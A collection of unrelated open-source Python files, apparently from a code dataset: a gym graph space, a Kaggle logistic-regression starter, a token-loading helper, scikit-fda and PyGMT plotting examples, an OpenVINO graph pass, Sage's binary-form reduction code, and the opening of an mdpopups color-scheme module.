from __future__ import print_function
from typing import Any
import gym
import networkx as nx
class GraphSpace(gym.Space):
"""The space of random NetworkX graphs with a given number of nodes.
Graphs sampled from this space are drawn from the Erdos-Renyi random graph
model where each pair of nodes shares an edge with probability p.
Graphs can be directed or undirected.
Two graph spaces are considered equivalent if they have the same number of
nodes, the same edge probability, and the same directedness.
"""
def __init__(self, num_nodes, directed = False, p = 0.05):
"""Initialize a GraphSpace instance.
Args:
num_nodes: A positive integer indicating the number of nodes of graphs
that are contained in this space.
directed: A boolean indicating whether this space contains directed or
undirected graphs.
p: A float in [0, 1] that gives the probability that any two nodes are
connected by an edge in graphs that are sampled from this space.
"""
self.num_nodes = num_nodes
self.directed = directed
self.p = p
def contains(self, item):
return (isinstance(item, nx.Graph)
and item.number_of_nodes() == self.num_nodes)
def sample(self):
return nx.fast_gnp_random_graph(
self.num_nodes, self.p, directed=self.directed)
def __repr__(self):
return 'Graph (%d, %.4f, %s)' % (
self.num_nodes, self.p, self.directed)
def __eq__(self, other):
return (
isinstance(other, self.__class__)
and self.num_nodes == other.num_nodes
and self.p == other.p
and self.directed == other.directed)
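# Minimal usage sketch (an added illustration, not part of the original
# module): sample one graph from a small undirected space and check membership.
if __name__ == '__main__':
  example_space = GraphSpace(num_nodes=10, p=0.1)
  example_graph = example_space.sample()
  assert example_space.contains(example_graph)
  print('Sampled a graph with %d edges.' % example_graph.number_of_edges())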
|
Logistic-Regression/classifier_corrected.py | joao-r-santos/DataSciencePython | 5,070 | 12687873 |
#https://www.kaggle.com/c/amazon-employee-access-challenge/forums/t/4797/starter-code-in-python-with-scikit-learn-auc-885
""" Amazon Access Challenge Starter Code
These files provide some starter code using
the scikit-learn library. It provides some examples on how
to design a simple algorithm, including pre-processing,
training a logistic regression classifier on the data,
assess its performance through cross-validation and some
pointers on where to go next.
<NAME> <<EMAIL>>
"""
from __future__ import division
import numpy as np
from sklearn import (metrics, cross_validation, linear_model, preprocessing)
SEED = 42 # always use a seed for randomized procedures
def load_data(filename, use_labels=True):
"""
    Load data from CSV files and return them as numpy arrays.
The use_labels parameter indicates whether one should
read the first column (containing class labels). If false,
return all 0s.
"""
# load column 1 to 8 (ignore last one)
data = np.loadtxt(open("data/" + filename), delimiter=',',
usecols=range(1, 9), skiprows=1)
if use_labels:
labels = np.loadtxt(open("data/" + filename), delimiter=',',
usecols=[0], skiprows=1)
else:
labels = np.zeros(data.shape[0])
return labels, data
def save_results(predictions, filename):
"""Given a vector of predictions, save results in CSV format."""
with open(filename, 'w') as f:
f.write("id,ACTION\n")
for i, pred in enumerate(predictions):
f.write("%d,%f\n" % (i + 1, pred))
def main():
"""
Fit models and make predictions.
We'll use one-hot encoding to transform our categorical features
into binary features.
y and X will be numpy array objects.
"""
model = linear_model.LogisticRegression(C=3) # the classifier we'll use
# === load data in memory === #
print "loading data"
y, X = load_data('train.csv')
y_test, X_test = load_data('test.csv', use_labels=False)
# === one-hot encoding === #
# we want to encode the category IDs encountered both in
# the training and the test set, so we fit the encoder on both
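    # (Illustrative aside, not from the original code: a single categorical
    # column with values [3, 7, 3] becomes two indicator columns
    # [[1, 0], [0, 1], [1, 0]] after one-hot encoding.)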
encoder = preprocessing.OneHotEncoder()
encoder.fit(np.vstack((X, X_test)))
X = encoder.transform(X) # Returns a sparse matrix (see numpy.sparse)
X_test = encoder.transform(X_test)
# if you want to create new features, you'll need to compute them
# before the encoding, and append them to your dataset after
# === training & metrics === #
mean_auc = 0.0
n = 10 # repeat the CV procedure 10 times to get more precise results
for i in range(n):
# for each iteration, randomly hold out 20% of the data as CV set
X_train, X_cv, y_train, y_cv = cross_validation.train_test_split(
X, y, test_size=.20, random_state=i*SEED)
# if you want to perform feature selection / hyperparameter
# optimization, this is where you want to do it
# train model and make predictions
model.fit(X_train, y_train)
preds = model.predict_proba(X_cv)[:, 1]
# compute AUC metric for this CV fold
fpr, tpr, thresholds = metrics.roc_curve(y_cv, preds)
roc_auc = metrics.auc(fpr, tpr)
print "AUC (fold %d/%d): %f" % (i + 1, n, roc_auc)
mean_auc += roc_auc
print "Mean AUC: %f" % (mean_auc/n)
# === Predictions === #
# When making predictions, retrain the model on the whole training set
model.fit(X, y)
preds = model.predict_proba(X_test)[:, 1]
filename = raw_input("Enter name for submission file: ")
save_results(preds, filename + ".csv")
if __name__ == '__main__':
main()
|
atlas/foundations_authentication/src/foundations_authentication/user_token.py | DeepLearnI/atlas | 296 | 12687875 |
def user_token():
from foundations_contrib.utils import foundations_home
from os.path import expanduser, join
import yaml
import os
token = os.getenv('FOUNDATIONS_TOKEN', None)
if not token:
credential_filepath = expanduser(join(foundations_home(), "credentials.yaml"))
if not os.path.isfile(credential_filepath):
return None
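        # The credentials file is expected to look roughly like this
        # (an illustrative sketch inferred from the lookups below, not an
        # authoritative schema):
        #
        #   default:
        #     token: <user token>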
with open(credential_filepath, "r") as file:
credential_dict = yaml.load(file, Loader=yaml.FullLoader)
if "default" not in credential_dict:
return None
if "token" not in credential_dict["default"]:
return None
token = credential_dict["default"]["token"]
return token |
examples/plot_representation.py | jiduque/scikit-fda | 147 | 12687900 | """
Representation of functional data
=================================
Explores the different representations of functional data.
"""
# Author: <NAME>
# License: MIT
import skfda
from skfda.representation.interpolation import SplineInterpolation
import skfda.representation.basis as basis
##############################################################################
# In this example we are going to show the different representations of
# functional data available in scikit-fda.
#
# First we are going to fetch a functional data dataset, such as the Berkeley
# Growth Study. This dataset corresponds to the height of several boys and
# girls measured until 18 years of age. The number and times of the
# measurements are the same for each individual.
dataset = skfda.datasets.fetch_growth()
fd = dataset['data']
y = dataset['target']
print(repr(fd))
fd.plot(group=y, group_colors=['red', 'blue'])
##############################################################################
# This kind of representation is a discretized representation, in which the
# measurement points are shared between samples.
print(fd.grid_points)
##############################################################################
# In this representation, the data can be arranged as a matrix.
print(fd.data_matrix)
##############################################################################
# By default, the data points are interpolated using a linear interpolation,
# but this is configurable.
dataset = skfda.datasets.fetch_medflies()
fd = dataset['data']
first_curve = fd[0]
first_curve.plot()
##############################################################################
# The interpolation used can however be changed. Here, we will use an
# interpolation with degree 3 splines.
first_curve.interpolation = SplineInterpolation(3)
first_curve.plot()
##############################################################################
# This representation allows also functions with arbitrary dimensions of the
# domain and codomain.
fd = skfda.datasets.make_multimodal_samples(n_samples=1, dim_domain=2,
dim_codomain=2)
print(fd.dim_domain)
print(fd.dim_codomain)
fd.plot()
##############################################################################
# Another possible representation is a decomposition in a basis of functions.
# $$
# f(t) = \\sum_{i=1}^N a_i \\phi_i(t)
# $$
# It is possible to transform between both representations. Let us use again
# the Berkeley Growth dataset.
dataset = skfda.datasets.fetch_growth()
fd = dataset['data']
y = dataset['target']
fd.plot()
##############################################################################
# We will represent it using a basis of B-splines.
fd_basis = fd.to_basis(basis.BSpline(n_basis=4))
fd_basis.plot()
##############################################################################
# We can increase the number of elements in the basis to try to reproduce the
# original data with more fidelity.
fd_basis_big = fd.to_basis(basis.BSpline(n_basis=7))
fd_basis_big.plot()
#############################################################################
# Let's compare the different representations in the same plot, for the same
# curve.
fig = fd[0].plot()
fd_basis[0].plot(fig=fig)
fd_basis_big[0].plot(fig=fig)
fig.axes[0].legend(['Original', '4 elements', '7 elements'])
##############################################################################
# We can also see the effect of changing the basis.
# For example, in the Fourier basis the functions start and end at the same
# points if the period is equal to the domain range, so this basis is clearly
# not suitable for the Growth dataset.
fd_basis = fd.to_basis(basis.Fourier(n_basis=7))
fd_basis.plot()
##############################################################################
# The data is now represented as the coefficients in the basis expansion.
print(fd_basis)
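##############################################################################
# For further inspection, the coefficient matrix itself can be read from the
# ``coefficients`` attribute of the ``FDataBasis`` object (shown here only as
# an illustrative addition).
print(fd_basis.coefficients)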
|
model-optimizer/extensions/front/ChangePlaceholderTypes.py | monroid/openvino | 2,406 | 12687905 |
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import logging as log
import numpy as np
from mo.front.common.replacement import FrontReplacementPattern
from mo.graph.graph import Graph, Node
class ChangePlaceholderTypes(FrontReplacementPattern):
enabled = True
run_not_recursively = True
@staticmethod
def is_node_casts_to_float_or_shapeof(node: Node):
return (node.soft_get('type') == 'Convert' and node.soft_get('dst_type') == np.float32) or \
node.soft_get('type') == 'ShapeOf'
def find_and_replace_pattern(self, graph: Graph):
for op in graph.get_op_nodes(type='Parameter'):
consumer_nodes = [p.node for p in op.out_port(0).get_destinations()]
if all([ChangePlaceholderTypes.is_node_casts_to_float_or_shapeof(consumer) for consumer in consumer_nodes]):
log.debug('Convert data type of Parameter "{}" to float32'.format(op.soft_get('name', op.id)))
op.data_type = np.float32
for convert_node in consumer_nodes:
if convert_node.soft_get('type') == 'Convert':
log.debug('Removing "Convert" node "{}"'.format(convert_node.soft_get('name', convert_node.id)))
# disconnect consumer ports of Convert operations. Then connect them with an output of Parameter
convert_destinations = convert_node.out_port(0).get_destinations()
for dst_port in convert_destinations:
dst_port.disconnect()
for dst_port in convert_destinations:
op.out_port(0).connect(dst_port)
graph.remove_node(convert_node.id)
if op.soft_get('data_type') == np.int64:
op.data_type = np.int32
log.error('Convert data type of Parameter "{}" to int32'.format(op.soft_get('name', op.id)),
extra={'is_warning': True})
if op.soft_get('data_type') == np.uint8:
op.data_type = np.float32
log.debug('Convert data type of Parameter "{}" to float'.format(op.soft_get('name', op.id)))
|
src/sage/rings/polynomial/binary_form_reduce.py | UCD4IDS/sage | 1,742 | 12687948 | # -*- coding: utf-8 -*-
r"""
Helper functions for reduction of binary forms.
The algorithm for reducing is from Stoll and Cremona's "On the Reduction Theory of
Binary Forms" [CS2003]_. This takes a two variable homogeneous polynomial and finds a
reduced form. This is an `SL(2,\ZZ)`-equivalent binary form whose covariant in
the upper half plane is in the fundamental domain. Further, the algorithm
from Hutz and Stoll [HS2018]_ allows the form to be further minimized so that
the coefficients have either smallest height or smallest `L_2` norm.
AUTHORS:
- <NAME> -- initial version of reduction as part of GSOC 2016
- <NAME> (2018-7) -- improvements to reduce and implement smallest coefficient model
"""
# ****************************************************************************
# Copyright (C) 2018 <NAME> <<EMAIL>>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from sage.calculus.functions import jacobian
from sage.functions.hyperbolic import cosh, sinh
from sage.functions.log import exp
from sage.matrix.constructor import matrix
from sage.misc.misc_c import prod
from sage.modules.free_module_element import vector
from sage.rings.cc import CC
from sage.rings.complex_mpfr import ComplexField
from sage.rings.complex_interval_field import ComplexIntervalField
from sage.rings.integer_ring import ZZ
from sage.rings.laurent_series_ring import LaurentSeriesRing
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.rational_field import QQ
from sage.rings.real_mpfr import RealField
def covariant_z0(F, z0_cov=False, prec=53, emb=None, error_limit=0.000001):
r"""
Return the covariant and Julia invariant from Cremona-Stoll [CS2003]_.
In [CS2003]_ and [HS2018]_ the Julia invariant is denoted as `\Theta(F)`
or `R(F, z(F))`. Note that you may get faster convergence if you first move
`z_0(F)` to the fundamental domain before computing the true covariant
INPUT:
- ``F`` -- binary form of degree at least 3 with no multiple roots
- ``z0_cov`` -- boolean, compute only the `z_0` invariant. Otherwise, solve
the minimization problem
    - ``prec`` -- positive integer. precision to use in CC
    - ``emb`` -- embedding into CC
    - ``error_limit`` -- sets the error tolerance (default: 0.000001)
OUTPUT: a complex number, a real number
EXAMPLES::
sage: from sage.rings.polynomial.binary_form_reduce import covariant_z0
sage: R.<x,y> = QQ[]
sage: F = 19*x^8 - 262*x^7*y + 1507*x^6*y^2 - 4784*x^5*y^3 + 9202*x^4*y^4\
....: - 10962*x^3*y^5 + 7844*x^2*y^6 - 3040*x*y^7 + 475*y^8
sage: covariant_z0(F, prec=80, z0_cov=True)
(1.3832330115323681438175 + 0.31233552177413614978744*I,
3358.4074848663492819259)
sage: F = -x^8 + 6*x^7*y - 7*x^6*y^2 - 12*x^5*y^3 + 27*x^4*y^4\
....: - 4*x^3*y^5 - 19*x^2*y^6 + 10*x*y^7 - 5*y^8
sage: covariant_z0(F, prec=80)
(0.64189877107807122203366 + 1.1852516565091601348355*I,
3134.5148284344627168276)
::
sage: R.<x,y> = QQ[]
sage: covariant_z0(x^3 + 2*x^2*y - 3*x*y^2, z0_cov=True)[0]
0.230769230769231 + 0.799408065031789*I
sage: -1/covariant_z0(-y^3 + 2*y^2*x + 3*y*x^2, z0_cov=True)[0]
0.230769230769231 + 0.799408065031789*I
::
sage: R.<x,y> = QQ[]
sage: covariant_z0(2*x^2*y - 3*x*y^2, z0_cov=True)[0]
0.750000000000000 + 1.29903810567666*I
sage: -1/covariant_z0(-x^3 - x^2*y + 2*x*y^2, z0_cov=True)[0] + 1
0.750000000000000 + 1.29903810567666*I
::
sage: R.<x,y> = QQ[]
sage: covariant_z0(x^2*y - x*y^2, prec=100) # tol 1e-28
(0.50000000000000000000000000003 + 0.86602540378443864676372317076*I,
1.5396007178390020386910634147)
TESTS::
sage: R.<x,y>=QQ[]
sage: covariant_z0(x^2 + 24*x*y + y^2)
Traceback (most recent call last):
...
ValueError: must be at least degree 3
sage: covariant_z0((x+y)^3, z0_cov=True)
Traceback (most recent call last):
...
ValueError: cannot have multiple roots for z0 invariant
sage: covariant_z0(x^3 + 3*x*y + y)
Traceback (most recent call last):
...
TypeError: must be a binary form
sage: covariant_z0(-2*x^2*y^3 + 3*x*y^4 + 127*y^5)
Traceback (most recent call last):
...
ValueError: cannot have a root with multiplicity >= 5/2
sage: covariant_z0((x^2+2*y^2)^2)
Traceback (most recent call last):
...
ValueError: must have at least 3 distinct roots
"""
R = F.parent()
d = ZZ(F.degree())
if R.ngens() != 2 or any(sum(t) != d for t in F.exponents()):
raise TypeError('must be a binary form')
if d < 3:
raise ValueError('must be at least degree 3')
f = F.subs({R.gen(1): 1}).univariate_polynomial()
if f.degree() < d:
# we have a root at infinity
if f.constant_coefficient() != 0:
# invert so we find all roots!
mat = matrix(ZZ, 2, 2, [0, -1, 1, 0])
else:
t = 0
while f(t) == 0:
t += 1
mat = matrix(ZZ, 2, 2, [t, -1, 1, 0])
else:
mat = matrix(ZZ, 2, 2, [1, 0, 0, 1])
f = F(list(mat * vector(R.gens()))).subs({R.gen(1): 1}).univariate_polynomial()
# now we have a single variable polynomial with all the roots of F
K = ComplexField(prec=prec)
if f.base_ring() != K:
if emb is None:
f = f.change_ring(K)
else:
f = f.change_ring(emb)
roots = f.roots()
if max(ex for _, ex in roots) > 1 or f.degree() < d - 1:
if z0_cov:
raise ValueError('cannot have multiple roots for z0 invariant')
else:
# just need a starting point for Newton's method
f = f.lc() * prod(p for p, ex in f.factor()) # removes multiple roots
if f.degree() < 3:
raise ValueError('must have at least 3 distinct roots')
roots = f.roots()
roots = [p for p, _ in roots]
# finding quadratic Q_0, gives us our covariant, z_0
dF = f.derivative()
n = ZZ(f.degree())
PR = PolynomialRing(K, 'x,y')
x, y = PR.gens()
# finds Stoll and Cremona's Q_0
q = sum([(1/(dF(r).abs()**(2/(n-2)))) * ((x-(r*y)) * (x-(r.conjugate()*y)))
for r in roots])
# this is Q_0 , always positive def as long as F has distinct roots
A = q.monomial_coefficient(x**2)
B = q.monomial_coefficient(x * y)
C = q.monomial_coefficient(y**2)
# need positive root
try:
z = ((-B + ((B**2)-(4*A*C)).sqrt()) / (2 * A))
except ValueError:
raise ValueError("not enough precision")
if z.imag() < 0:
z = (-B - ((B**2)-(4*A*C)).sqrt()) / (2 * A)
if z0_cov:
FM = f # for Julia's invariant
else:
# solve the minimization problem for 'true' covariant
        CF = ComplexIntervalField(prec=prec) # keeps track of our precision error
z = CF(z)
FM = F(list(mat * vector(R.gens()))).subs({R.gen(1): 1}).univariate_polynomial()
from sage.rings.polynomial.complex_roots import complex_roots
L1 = complex_roots(FM, min_prec=prec)
L = []
# making sure multiplicity isn't too large using convergence conditions in paper
for p, e in L1:
if e >= d / 2:
raise ValueError('cannot have a root with multiplicity >= %s/2' % d)
for _ in range(e):
L.append(p)
RCF = PolynomialRing(CF, 'u,t')
a = RCF.zero()
c = RCF.zero()
u, t = RCF.gens()
for l in L:
denom = ((t - l) * (t - l.conjugate()) + u**2)
a += u**2 / denom
c += (t - l.real()) / denom
# Newton's Method, to find solutions. Error bound is less than diameter of our z
err = z.diameter()
zz = z.diameter()
g1 = a.numerator() - d / 2 * a.denominator()
g2 = c.numerator()
G = vector([g1, g2])
J = jacobian(G, [u, t])
v0 = vector([z.imag(), z.real()]) # z0 as starting point
# finds our correct z
while err <= zz:
NJ = J.subs({u: v0[0], t: v0[1]})
NJinv = NJ.inverse()
# inverse for CIF matrix seems to return fractions not CIF elements, fix them
if NJinv.base_ring() != CF:
NJinv = matrix(CF, 2, 2, [CF(zw.numerator() / zw.denominator())
for zw in NJinv.list()])
w = z
v0 = v0 - NJinv*G.subs({u: v0[0], t: v0[1]})
z = v0[1].constant_coefficient() + v0[0].constant_coefficient()*CF.gen(0)
err = z.diameter() # precision
zz = (w - z).abs().lower() # difference in w and z
else:
            # this runs when the while loop exits without a break
if err > error_limit or err.is_NaN():
raise ValueError("accuracy of Newton's root not within tolerance(%s > %s), increase precision" % (err, error_limit))
if z.imag().upper() <= z.diameter():
raise ArithmeticError("Newton's method converged to z not in the upper half plane")
z = z.center()
# Julia's invariant
if FM.base_ring() != ComplexField(prec=prec):
FM = FM.change_ring(ComplexField(prec=prec))
tF = z.real()
uF = z.imag()
th = FM.lc().abs()**2
for r, ex in FM.roots():
for _ in range(ex):
th = th * ((((r-tF).abs())**2 + uF**2)/uF)
# undo shift and invert (if needed)
# since F \cdot m ~ m^(-1)\cdot z
# we apply m to z to undo m acting on F
l = mat * vector([z, 1])
return l[0] / l[1], th
# // compute inverse of eps_F
# from <NAME>
def epsinv(F, target, prec=53, target_tol=0.001, z=None, emb=None):
"""
Compute a bound on the hyperbolic distance.
The true minimum will be within the computed bound.
It is computed as the inverse of epsilon_F from [HS2018]_.
INPUT:
- ``F`` -- binary form of degree at least 3 with no multiple roots
- ``target`` -- positive real number. The value we want to attain, i.e.,
the value we are taking the inverse of
    - ``prec`` -- positive integer. precision to use in CC
- ``target_tol`` -- positive real number. The tolerance with which we
attain the target value.
- ``z`` -- complex number. ``z_0`` covariant for F.
- ``emb`` -- embedding into CC
OUTPUT: a real number delta satisfying target + target_tol > eps_F(delta) > target.
EXAMPLES::
sage: from sage.rings.polynomial.binary_form_reduce import epsinv
sage: R.<x,y> = QQ[]
sage: epsinv(-2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3, 31.5022020249597) # tol 1e-12
4.02520895942207
"""
def RQ(delta):
# this is the quotient R(F_0,z)/R(F_0,z(F)) for a generic z
# at distance delta from j. See Lemma 4.2 in [HS2018].
cd = cosh(delta).n(prec=prec)
sd = sinh(delta).n(prec=prec)
return prod([cd + (cost * phi[0] + sint * phi[1]) * sd for phi in phis])
def epsF(delta):
pol = RQ(delta) # get R quotient in terms of z
S = PolynomialRing(C, 'v')
g = S([(i - d) * pol[i - d] for i in range(2 * d + 1)]) # take derivative
drts = [e for e in g.roots(ring=C, multiplicities=False)
if (e.norm() - 1).abs() < 0.1]
# find min
return min([pol(r / r.abs()).real() for r in drts])
C = ComplexField(prec=prec)
R = F.parent()
d = F.degree()
if z is None:
z, th = covariant_z0(F, prec=prec, emb=emb)
else: # need to do our own input checking
if R.ngens() != 2 or any(sum(t) != d for t in F.exponents()):
raise TypeError('must be a binary form')
if d < 3:
raise ValueError('must be at least degree 3')
f = F.subs({R.gen(1): 1}).univariate_polynomial()
# now we have a single variable polynomial
if (max(ex for p, ex in f.roots(ring=C)) >= QQ(d)/2 or
f.degree() < QQ(d)/2):
raise ValueError('cannot have root with multiplicity >= deg(F)/2')
R = RealField(prec=prec)
PR = PolynomialRing(R, 't')
t = PR.gen(0)
# compute phi_1, ..., phi_k
# first find F_0 and its roots
# this change of variables on f moves z(f) to j, i.e. produces F_0
rts = f(z.imag()*t + z.real()).roots(ring=C)
phis = [] # stereographic projection of roots
for r, e in rts:
phis.extend([[2*r.real()/(r.norm()+1), (r.norm()-1)/(r.norm()+1)]])
if d != f.degree(): # include roots at infinity
phis.extend([(d - f.degree()) * [0, 1]])
# for writing RQ in terms of generic z to minimize
LC = LaurentSeriesRing(C, 'u', default_prec=2 * d + 2)
u = LC.gen(0)
cost = (u + u**(-1)) / 2
sint = (u - u**(-1)) / (2 * C.gen(0))
# first find an interval containing the desired value
# then use regula falsi on log eps_F
# d -> delta value in interval [0,1]
# v in value in interval [1,epsF(1)]
dl = R(0.0)
vl = R(1.0)
du = R(1.0)
vu = epsF(du)
while vu < target:
# compute the next value of epsF for delta = 2*delta
dl = du
vl = vu
du *= 2
vu = epsF(du)
# now dl < delta <= du
logt = target.log()
l2 = (vu.log() - logt).n(prec=prec)
l1 = (vl.log() - logt).n(prec=prec)
dn = (dl*l2 - du*l1)/(l2 - l1)
vn = epsF(dn)
dl = du
vl = vu
du = dn
vu = vn
while (du - dl).abs() >= target_tol or max(vl, vu) < target:
l2 = (vu.log() - logt).n(prec=prec)
l1 = (vl.log() - logt).n(prec=prec)
dn = (dl * l2 - du * l1) / (l2 - l1)
vn = epsF(dn)
dl = du
vl = vu
du = dn
vu = vn
return max(dl, du)
def get_bound_poly(F, prec=53, norm_type='norm', emb=None):
"""
The hyperbolic distance from `j` which must contain the smallest poly.
This defines the maximum possible distance from `j` to the `z_0` covariant
in the hyperbolic 3-space for which the associated `F` could have smaller
coefficients.
INPUT:
- ``F`` -- binary form of degree at least 3 with no multiple roots
    - ``prec`` -- positive integer. precision to use in CC
- ``norm_type`` -- string, either norm or height
- ``emb`` -- embedding into CC
OUTPUT: a positive real number
EXAMPLES::
sage: from sage.rings.polynomial.binary_form_reduce import get_bound_poly
sage: R.<x,y> = QQ[]
sage: F = -2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3
sage: get_bound_poly(F) # tol 1e-12
28.0049336543295
sage: get_bound_poly(F, norm_type='height') # tol 1e-11
111.890642019092
"""
if F.base_ring() != ComplexField(prec=prec):
if emb is None:
compF = F.change_ring(ComplexField(prec=prec))
else:
compF = F.change_ring(emb)
else:
compF = F
n = F.degree()
assert(n > 2), "degree 2 polynomial"
z0F, thetaF = covariant_z0(compF, prec=prec, emb=emb)
if norm_type == 'norm':
# euclidean norm squared
normF = (sum([abs(i)**2 for i in compF.coefficients()]))
target = (2**(n - 1)) * normF / thetaF
elif norm_type == 'height':
hF = exp(max([c.global_height(prec=prec) for c in F.coefficients()])) # height
target = (2**(n - 1)) * (n + 1) * (hF**2) / thetaF
else:
raise ValueError('type must be norm or height')
return cosh(epsinv(F, target, prec=prec))
def smallest_poly(F, prec=53, norm_type='norm', emb=None):
r"""
    Determine the poly with smallest coefficients in the `SL(2,\Z)` orbit of ``F``.
Smallest can be in the sense of `L_2` norm or height.
The method is the algorithm in Hutz-Stoll [HS2018]_.
``F`` needs to be a binary form with no multiple roots of degree
at least 3. It should already be reduced in the sense of
Cremona-Stoll [CS2003]_.
INPUT:
- ``F`` -- binary form of degree at least 3 with no multiple roots
- ``norm_type`` -- string - ``norm`` or ``height`` controlling what ``smallest``
means for the coefficients.
OUTPUT: pair [poly, matrix]
EXAMPLES::
sage: from sage.rings.polynomial.binary_form_reduce import smallest_poly
sage: R.<x,y> = QQ[]
sage: F = -x^8 + 6*x^7*y - 7*x^6*y^2 - 12*x^5*y^3 + 27*x^4*y^4\
....: - 4*x^3*y^5 - 19*x^2*y^6 + 10*x*y^7 - 5*y^8
sage: smallest_poly(F, prec=100) #long time
[
-x^8 - 2*x^7*y + 7*x^6*y^2 + 16*x^5*y^3 + 2*x^4*y^4 - 2*x^3*y^5 + 4*x^2*y^6 - 5*y^8,
<BLANKLINE>
[1 1]
[0 1]
]
::
sage: from sage.rings.polynomial.binary_form_reduce import smallest_poly, get_bound_poly
sage: R.<x,y> = QQ[]
sage: F = -2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3
sage: smallest_poly(F)
[
[1 4]
-2*x^3 - 22*x^2*y - 77*x*y^2 + 43*y^3, [0 1]
]
sage: F0, M = smallest_poly(F, norm_type='height')
sage: F0, M # random
(
[5 4]
-58*x^3 - 47*x^2*y + 52*x*y^2 + 43*y^3, [1 1]
)
sage: M in SL2Z, F0 == R.hom(M * vector([x, y]))(F)
(True, True)
sage: get_bound_poly(F0, norm_type='height') # tol 1e-12
23.3402702199809
An example with a multiple root::
sage: R.<x,y> = QQ[]
sage: F = -16*x^7 - 114*x^6*y - 345*x^5*y^2 - 599*x^4*y^3 - 666*x^3*y^4\
....: - 481*x^2*y^5 - 207*x*y^6 - 40*y^7
sage: F.reduced_form()
(
[-1 -1]
-x^5*y^2 - 24*x^3*y^4 - 3*x^2*y^5 - 2*x*y^6 + 16*y^7, [ 1 0]
)
"""
def insert_item(pts, item, index):
# binary insertion to maintain list of points left to consider
N = len(pts)
if N == 0:
return [item]
elif N == 1:
if item[index] > pts[0][index]:
pts.insert(0, item)
else:
pts.append(item)
return pts
else: # binary insertion
left = 1
right = N
mid = (left + right) // 2 # these are ints so this is .floor()
if item[index] > pts[mid][index]: # item goes into first half
return insert_item(pts[:mid], item, index) + pts[mid:N]
else: # item goes into second half
return pts[:mid] + insert_item(pts[mid:N], item, index)
def coshdelta(z):
# The cosh of the hyperbolic distance from z = t+uj to j
        return (z.norm() + 1)/(2*z.imag())
    # reduce in the sense of Cremona-Stoll
    G = F
MG = matrix(ZZ, 2, 2, [1, 0, 0, 1])
x, y = G.parent().gens()
if norm_type == 'norm':
current_size = sum([abs(i)**2 for i in G.coefficients()]) # euclidean norm squared
elif norm_type == 'height': # height
current_size = exp(max([c.global_height(prec=prec) for c in G.coefficients()]))
else:
raise ValueError('type must be norm or height')
v0, th = covariant_z0(G, prec=prec, emb=emb)
rep = 2 * CC.gen(0) # representative point in fundamental domain
from math import isnan
if isnan(v0.abs()):
raise ValueError("invalid covariant: %s" % v0)
R = get_bound_poly(G, prec=prec, norm_type=norm_type)
# check orbit
S = matrix(ZZ, 2, 2, [0, -1, 1, 0])
T = matrix(ZZ, 2, 2, [1, 1, 0, 1])
TI = matrix(ZZ, 2, 2, [1, -1, 0, 1])
count = 0
pts = [[G, v0, rep, MG, coshdelta(v0), 0]] # label - 0:None, 1:S, 2:T, 3:T^(-1)
current_min = [G, v0, rep, MG, coshdelta(v0)]
while pts:
G, v, rep, M, D, label = pts.pop()
# apply ST and keep z, Sz
if D > R:
break # all remaining pts are too far away
# check if it is smaller. If so, we can improve the bound
count += 1
if norm_type == 'norm':
new_size = sum([abs(i)**2 for i in G.coefficients()]) # euclidean norm squared
else: # height
new_size = exp(max([c.global_height(prec=prec) for c in G.coefficients()]))
if new_size < current_size:
current_min = [G, v, rep, M, coshdelta(v)]
current_size = new_size
R = get_bound_poly(G, norm_type=norm_type, prec=prec, emb=emb)
# add new points to check
if label != 1 and min((rep+1).norm(), (rep-1).norm()) >= 1: # don't undo S
# the 2nd condition is equivalent to |\Re(-1/rep)| <= 1/2
# this means that rep can have resulted from an inversion step in
# the shift-and-invert procedure, so don't invert
# do inversion
z = -1 / v
new_pt = [G.subs({x: -y, y: x}), z, -1/rep, M*S, coshdelta(z), 1]
pts = insert_item(pts, new_pt, 4)
if label != 3: # don't undo TI
# do right shift
z = v - 1
new_pt = [G.subs({x: x + y}), z, rep-1, M*T, coshdelta(z), 2]
pts = insert_item(pts, new_pt, 4)
if label != 2: # don't undo T
# do left shift
z = v + 1
new_pt = [G.subs({x: x - y}), z, rep + 1, M * TI, coshdelta(z), 3]
pts = insert_item(pts, new_pt, 4)
return [current_min[0], current_min[3]]
|
examples/gallery/embellishments/inset.py | jbusecke/pygmt | 326 | 12687949 |
"""
Inset
-----
The :meth:`pygmt.Figure.inset` method adds an inset figure inside a larger
figure. The function is called using a ``with`` statement, and its
``position``, ``box``, ``offset``, and ``margin`` parameters are set. Plotting
methods called within the ``with`` statement are applied to the inset figure.
"""
import pygmt
fig = pygmt.Figure()
# Create the primary figure, setting the region to Madagascar, the land color
# to "brown", the water to "lightblue", the shorelines width to "thin", and
# adding a frame
fig.coast(region="MG+r2", land="brown", water="lightblue", shorelines="thin", frame="a")
# Create an inset, setting the position to top left, the width to 3.5 cm, and
# the x- and y-offsets to 0.2 cm. The margin is set to 0, and the border is
# "gold" with a pen size of 1.5p.
with fig.inset(position="jTL+w3.5c+o0.2c", margin=0, box="+p1.5p,gold"):
# Create a figure in the inset using coast. This example uses the azimuthal
    # orthographic projection centered at 47E, 20S. The land color is set to
# "gray" and Madagascar is highlighted in "red3".
fig.coast(
region="g",
projection="G47/-20/?",
land="gray",
water="white",
dcw="MG+gred3",
)
fig.show()
|
sublime/config/sublime-text-3.symlink/Packages/mdpopups/st3/mdpopups/st_scheme_template.py | ch1bo/dotfiles-old | 182 | 12687964 |
"""
Sublime Text Scheme template.
Converts a color scheme to CSS and provides templating so that
additional CSS can access the scheme colors.
Licensed under MIT
Copyright (c) 2015 - 2016 <NAME> <<EMAIL>>
----------------------
TextMate theme to CSS.
https://manual.macromates.com/en/language_grammars#naming_conventions
"""
import sublime
import re
from . import version as ver
from .rgba import RGBA
from .st_color_scheme_matcher import ColorSchemeMatcher
import jinja2
from pygments.formatters import HtmlFormatter
from collections import OrderedDict
from .st_clean_css import clean_css
import copy
import decimal
NEW_SCHEMES = int(sublime.version()) >= 3150
INVALID = -1
POPUP = 0
PHANTOM = 1
LUM_MIDPOINT = 127
re_float_trim = re.compile(r'^(?P<keep>\d+)(?P<trash>\.0+|(?P<keep2>\.\d*[1-9])0+)$')
